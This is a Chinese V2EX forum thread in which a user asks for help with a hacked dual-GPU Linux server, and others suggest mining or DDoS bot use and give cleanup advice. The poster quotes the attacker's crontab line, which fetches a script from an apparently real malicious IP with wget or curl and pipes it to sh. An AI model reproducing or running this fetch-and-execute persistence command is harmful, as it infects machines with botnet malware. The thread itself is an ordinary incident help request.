一个双显卡服务器被入侵了,他会定时从下载脚本并执行

2021-07-06 12:54:55 +08:00
 rwecho
http://185.150.117.29/x/b

帮忙分析下这些脚本是干什么的?目前看显卡并没有运行,而是定时占用大量带宽。
4075 次点击
所在节点    Linux
15 条回复
virusdefender
2021-07-06 13:06:26 +08:00
这种一般都是挖矿
rwecho
2021-07-06 13:07:56 +08:00
15 * * * * wget http://185.150.117.29/x/b -O- | sh || curl http://185.150.117.29/x/b | sh

它在电脑里面创建了一个用户名为:ps
然后里面有一个 crontab 命令
longbow0
2021-07-06 13:21:13 +08:00
主要是从 185.150.117.29 下载适配了不同硬件版本的木马 bot.*

其中,bot.x86 介绍在 https://s.tencent.com/research/report/1101.html
CaffreySun
2021-07-06 13:39:05 +08:00
这个脚步比较简单,就是“感染”你的服务器,并且创建定时任务重复“感染”。
至于他“感染”你的服务做什么,得看他执行的那些“bot”开头的程序了,找大佬反编译分析一下。
或许用来挖坑。
或许用来执行网络攻击。
wat4me
2021-07-06 16:11:09 +08:00
Aresrun
2021-07-06 16:27:19 +08:00
我之前也被入侵了。服务器上没啥东西,就重装了系统
lopetver
2021-07-06 16:34:37 +08:00
@rwecho 认真的吗

这只是一个定时下载的任务而已啊,哪里有“它在电脑里面创建了一个用户名为:ps
然后里面有一个 crontab 命令” 这些操作
missz
2021-07-06 17:10:59 +08:00
把服务器做为肉鸡,用来 ddos,所以会时不时带宽拉满
no1xsyzy
2021-07-06 19:00:09 +08:00
命令行 HTTP 客户端竟然是 wget 和 curl 而没有 lynx
我记得哪个 Unix 环境是默认只有 lynx 的来着?
hlobo
2021-07-06 19:05:57 +08:00
攻击它下载脚本的服务器
changchong
2021-07-06 22:42:41 +08:00
修改端口怎么样
yogogo
2021-07-07 08:09:40 +08:00
前几天我一台也是给挂挖矿的,后来就关端口,开 selinux,就好了
rwecho
2021-07-07 09:32:39 +08:00
已经把下载的脚本清空了,目前没看到有异常情况,之前 root 密码太弱了
lanshee
2021-07-07 09:58:50 +08:00
@rwecho #23 清空是治标不治本的.
guanyin8cnq12
2021-07-07 13:57:51 +08:00
一个字,格

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/787835

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX